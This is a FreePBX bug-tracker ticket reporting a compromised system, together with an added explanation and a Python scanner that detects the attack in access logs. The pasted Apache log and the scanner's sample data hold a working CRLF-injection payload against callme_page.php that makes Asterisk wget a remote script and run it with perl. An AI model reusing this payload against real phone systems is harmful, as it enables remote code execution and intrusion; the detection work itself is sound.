Ticket #5848 (closed Bugs: invalid)

Opened 1 year ago

Last modified 1 year ago

my system was compromised

Reported by: a0d75 Assigned to:
Priority: minor Milestone: 2.11
Component: ARI Version: 2.9-branch
Keywords: Cc:
Confirmation: Unreviewed Distro:
Backend Engine: Asterisk 1.6 Distro Ver:
Backend Ver: SVN Revision (if applicable):

Description

yesterday my system was compromised: a PHP shell script was added to

/var/www/localhost/htdocs/recordings/main.php

apache log information:

37.8.21.40 - - [21/May/2012:08:54:36 +0400] "GET /recordings/ HTTP/1.1" 200 5293
37.8.21.40 - - [21/May/2012:08:54:37 +0400] "GET /recordings/theme/main.css HTTP/1.1" 200 184
37.8.21.40 - - [21/May/2012:08:54:37 +0400] "GET /recordings/theme/logo.png HTTP/1.1" 200 8049
37.8.21.40 - - [21/May/2012:08:54:37 +0400] "GET /recordings/theme/navigation.css HTTP/1.1" 200 2404
37.8.21.40 - - [21/May/2012:08:54:37 +0400] "GET /recordings/theme/spacer.gif HTTP/1.1" 200 43
37.8.21.40 - - [21/May/2012:08:54:37 +0400] "GET /recordings/theme/global.css HTTP/1.1" 200 1354
37.8.21.40 - - [21/May/2012:08:54:37 +0400] "GET /recordings/theme/text.css HTTP/1.1" 200 61
37.8.21.40 - - [21/May/2012:08:54:37 +0400] "GET /recordings/theme/layout.css HTTP/1.1" 200 6043
37.8.21.40 - - [21/May/2012:08:54:37 +0400] "GET /recordings/theme/header.css HTTP/1.1" 200 1146
37.8.21.40 - - [21/May/2012:08:54:38 +0400] "GET /recordings/theme/iefixes.css HTTP/1.1" 200 283
37.8.21.40 - - [21/May/2012:08:54:37 +0400] "GET /recordings/theme/js/libfreepbx.javascripts.js HTTP/1.1" 200 302944
37.8.21.40 - - [21/May/2012:08:54:46 +0400] "GET /favicon.ico HTTP/1.1" 404 209
37.8.21.40 - - [21/May/2012:08:55:06 +0400] "GET /admin HTTP/1.1" 301 235
37.8.21.40 - - [21/May/2012:08:55:06 +0400] "GET /admin/ HTTP/1.1" 302 -
37.8.21.40 - - [21/May/2012:08:55:06 +0400] "GET /admin/config.php HTTP/1.1" 401 3034
37.8.21.40 - freepbx [21/May/2012:08:55:20 +0400] "GET /admin/config.php HTTP/1.1" 401 3034
37.8.21.40 - admin [21/May/2012:08:55:26 +0400] "GET /admin/config.php HTTP/1.1" 401 3034
37.8.21.40 - - [21/May/2012:08:55:30 +0400] "GET /admin/common/script.js.php?load_version=2.9.0.10 HTTP/1.1" 200 1111
37.8.21.40 - - [21/May/2012:08:55:31 +0400] "GET /admin/assets/js/jquery.cookie.js HTTP/1.1" 200 4247
37.8.21.40 - - [21/May/2012:08:55:30 +0400] "GET /admin/common/mainstyle.css?load_version=2.9.0.10 HTTP/1.1" 200 15911
37.8.21.40 - - [21/May/2012:08:55:31 +0400] "GET /admin/assets/js/jquery.toggleval.3.0.js HTTP/1.1" 200 3496
37.8.21.40 - - [21/May/2012:08:55:31 +0400] "GET /admin/assets/js/interface.dim.js HTTP/1.1" 200 3761
37.8.21.40 - - [21/May/2012:08:55:31 +0400] "GET /admin/assets/js/script.legacy.js HTTP/1.1" 200 19594
37.8.21.40 - - [21/May/2012:08:55:31 +0400] "GET /admin/assets/js/jquery.dimensions.js HTTP/1.1" 200 20547
37.8.21.40 - - [21/May/2012:08:55:32 +0400] "GET /admin/assets/js/tabber-minimized.js HTTP/1.1" 200 4904
37.8.21.40 - - [21/May/2012:08:55:31 +0400] "GET /admin/assets/js/jquery-ui-1.8.x.min.js HTTP/1.1" 200 198688
37.8.21.40 - - [21/May/2012:08:55:30 +0400] "GET /admin/assets/js/jquery-1.4.x.min.js HTTP/1.1" 200 78696
37.8.21.40 - - [21/May/2012:08:55:32 +0400] "GET /admin/images/favicon.ico HTTP/1.1" 200 318
37.8.21.40 - - [21/May/2012:09:00:21 +0400] "GET /admin/ HTTP/1.1" 302 -
37.8.21.40 - - [21/May/2012:09:00:21 +0400] "GET /admin/config.php HTTP/1.1" 401 3034
37.8.21.40 - freepbx [21/May/2012:09:00:29 +0400] "GET /admin/config.php HTTP/1.1" 401 3034
37.8.21.40 - admin [21/May/2012:09:00:34 +0400] "GET /admin/config.php HTTP/1.1" 401 3034
37.8.21.40 - admin [21/May/2012:09:00:45 +0400] "GET /admin/config.php HTTP/1.1" 401 3034
37.8.21.40 - - [21/May/2012:09:00:46 +0400] "GET /admin/common/mainstyle.css?load_version=2.9.0.10 HTTP/1.1" 200 15911
37.8.21.40 - - [21/May/2012:09:00:47 +0400] "GET /admin/assets/js/script.legacy.js HTTP/1.1" 200 19594
37.8.21.40 - - [21/May/2012:09:00:47 +0400] "GET /admin/assets/js/jquery.dimensions.js HTTP/1.1" 200 20547
37.8.21.40 - - [21/May/2012:09:00:50 +0400] "GET /admin/images/freepbx_large.png?load_version=2.9.0.10 HTTP/1.1" 200 7590
37.8.21.40 - - [21/May/2012:09:00:50 +0400] "GET /admin/images/logo.png?load_version=2.9.0.10 HTTP/1.1" 200 5699
37.8.21.40 - - [21/May/2012:09:00:51 +0400] "GET /panel HTTP/1.1" 401 401
37.8.21.40 - - [21/May/2012:09:00:47 +0400] "GET /admin/assets/js/jquery-1.4.x.min.js HTTP/1.1" 200 78696
37.8.21.40 - - [21/May/2012:09:00:47 +0400] "GET /admin/assets/js/jquery-ui-1.8.x.min.js HTTP/1.1" 200 198688
37.8.21.40 - - [21/May/2012:09:20:50 +0400] "GET /recordings/misc/callme_page.php?action=c&callmenum=*011@from-internal/n%250D%250AApplication:%2520system%250D%250AData:%2520wget%2520http://109.169.37.143/a/dcm.txt%2520-O%2520/tmp/back.txt%3bperl%2520/tmp/back.txt%250D%250A%250D%250A HTTP/1.1" 200 1155
37.8.21.40 - - [21/May/2012:09:20:51 +0400] "GET /recordings/theme/main.css HTTP/1.1" 200 184
37.8.21.40 - - [21/May/2012:09:20:51 +0400] "GET /recordings/theme/global.css HTTP/1.1" 200 1354
37.8.21.40 - - [21/May/2012:09:20:52 +0400] "GET /recordings/theme/iefixes.css HTTP/1.1" 200 283
37.8.21.40 - - [21/May/2012:09:20:52 +0400] "GET /recordings/theme/layout.css HTTP/1.1" 200 6043
37.8.21.40 - - [21/May/2012:09:20:52 +0400] "GET /recordings/theme/navigation.css HTTP/1.1" 200 2404
37.8.21.40 - - [21/May/2012:09:20:52 +0400] "GET /recordings/theme/header.css HTTP/1.1" 200 1146
37.8.21.40 - - [21/May/2012:09:20:55 +0400] "GET /recordings/theme/text.css HTTP/1.1" 200 61
37.8.21.40 - - [21/May/2012:09:20:55 +0400] "GET /favicon.ico HTTP/1.1" 404 209
37.8.21.40 - - [21/May/2012:09:20:56 +0400] "GET /favicon.ico HTTP/1.1" 404 209
37.8.21.40 - - [21/May/2012:09:20:56 +0400] "GET /favicon.ico HTTP/1.1" 404 209
37.8.21.40 - - [21/May/2012:09:21:00 +0400] "GET /recordings/misc/callme_page.php?action=c&callmenum=*011@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20wget%20http://109.169.37.143/a/dcm.txt%20-O%20/tmp/back.txt;perl%20/tmp/back.txt%0D%0A%0D%0A HTTP/1.1" 200 1127
37.8.21.40 - - [21/May/2012:09:21:27 +0400] "GET /recordings/main.php HTTP/1.1" 404 217

my system: Gentoo, FreePBX 2.9.0.10
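The two `callme_page.php` requests in the log above are the actual exploit: the `callmenum` parameter carries percent-encoded CR/LF pairs (once in `%0D%0A` form, once double-encoded as `%250D%250A`) followed by Asterisk Manager headers, so the ARI "call me" Originate ends up with an `Application: system` / `Data: wget ... ; perl ...` pair appended to it. The script below is an added detection example, not code from the ticket or from FreePBX: it parses Apache common-format access-log lines, decodes `callmenum` until the encoding is stable, and reports any request in which header lines follow the dialled number. The two attack lines are copied from the ticket; the benign lines in `SAMPLE_LOG` and the `192.0.2.10` address are constructed for the example, and the path and parameter name are taken from the log, not from the FreePBX source.

```python
"""Detect CRLF header injection through the ARI callme_page.php callmenum
parameter in Apache access logs.

Added example for illustration; not FreePBX code. The attacker's lines are
taken from the ticket, the benign lines are constructed.
"""
import re
from urllib.parse import unquote

# Apache common log: ip ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Path and parameter name as they appear in the ticket's log.
ARI_CALLME_PATH = "/recordings/misc/callme_page.php"

SAMPLE_LOG = [
    # From the ticket: ordinary browsing of the recordings page (benign)
    '37.8.21.40 - - [21/May/2012:08:54:36 +0400] "GET /recordings/ HTTP/1.1" 200 5293',
    # From the ticket: double-encoded payload (%250D%250A -> %0D%0A -> CRLF)
    '37.8.21.40 - - [21/May/2012:09:20:50 +0400] "GET /recordings/misc/callme_page.php?action=c&callmenum=*011@from-internal/n%250D%250AApplication:%2520system%250D%250AData:%2520wget%2520http://109.169.37.143/a/dcm.txt%2520-O%2520/tmp/back.txt%3bperl%2520/tmp/back.txt%250D%250A%250D%250A HTTP/1.1" 200 1155',
    # From the ticket: same payload, single-encoded
    '37.8.21.40 - - [21/May/2012:09:21:00 +0400] "GET /recordings/misc/callme_page.php?action=c&callmenum=*011@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20wget%20http://109.169.37.143/a/dcm.txt%20-O%20/tmp/back.txt;perl%20/tmp/back.txt%0D%0A%0D%0A HTTP/1.1" 200 1127',
    # Constructed: a legitimate "call me" request with a plain extension
    '192.0.2.10 - - [21/May/2012:10:00:00 +0400] "GET /recordings/misc/callme_page.php?action=c&callmenum=201@from-internal HTTP/1.1" 200 1100',
]


def fully_decode(value, max_rounds=4):
    """Percent-decode until the string stops changing, so %250D%250A and
    %0D%0A both end up as a real CRLF. Bounded to avoid pathological input."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def parse_query(query):
    """Split a raw query string on '&' only, leaving values undecoded.
    (urllib.parse.parse_qs on older Pythons also splits on ';', which would
    cut the unencoded ';perl' in the second attack line.)"""
    params = {}
    for pair in query.split("&"):
        if not pair:
            continue
        key, _, raw = pair.partition("=")
        params.setdefault(unquote(key), []).append(raw)
    return params


def smuggled_headers(callmenum):
    """Return (dialled_number, {header: value}) for a decoded callmenum.
    Anything after the first CR/LF that looks like 'Name: value' is a
    Manager header the caller should never be able to supply."""
    lines = re.split(r"\r\n|\n|\r", callmenum)
    headers = {}
    for extra in lines[1:]:
        name, sep, value = extra.partition(":")
        if sep and re.fullmatch(r"[A-Za-z][A-Za-z0-9-]*", name.strip()):
            headers[name.strip().lower()] = value.strip()  # Manager headers are case-insensitive
    return lines[0], headers


def find_ari_injections(log_lines):
    """One finding per callme_page.php request whose callmenum smuggles headers."""
    findings = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path, _, query = m.group("target").partition("?")
        if path != ARI_CALLME_PATH:
            continue
        for raw in parse_query(query).get("callmenum", []):
            number, headers = smuggled_headers(fully_decode(raw))
            if not headers:
                continue
            # 'Application: system' makes 'Data' a shell command run by Asterisk.
            command = headers.get("data") if headers.get("application", "").lower() == "system" else None
            findings.append({
                "ip": m.group("ip"),
                "time": m.group("time"),
                "status": int(m.group("status")),
                "number": number,
                "headers": headers,
                "command": command,
            })
    return findings


if __name__ == "__main__":
    for f in find_ari_injections(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} number={f['number']!r} command={f['command']!r}")
```

Run it against the real log (`find_ari_injections(open("/var/log/apache2/access_log"))`) and the two findings identify the source address, the exact command Asterisk was asked to run, and the HTTP 200 that shows the request was accepted; the benign `/recordings/` and plain-extension requests produce nothing. The repeated decoding matters: a filter that only decodes once misses the `%25` variant the attacker tried first.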

Change History

05/24/12 04:21:27 changed by mbrevda

  • status changed from new to closed.
  • resolution set to wontfix.

From a trixbox system. The irony! (it, itself, is probably hacked).

They seem to have exploited an issue that was patched recently. Please see here for more info, and use the forums if you need more assistance.

Thank you for bringing this to our attention.

05/25/12 00:18:41 changed by p_lindheimer

  • status changed from closed to reopened.
  • resolution deleted.

05/25/12 00:19:33 changed by p_lindheimer

  • component changed from Web interface to ARI.

Reclosing as invalid, as this has already been addressed some time ago and an update is available in Module Admin.

07/09/12 19:38:37 changed by p_lindheimer

  • status changed from reopened to closed.
  • resolution set to invalid.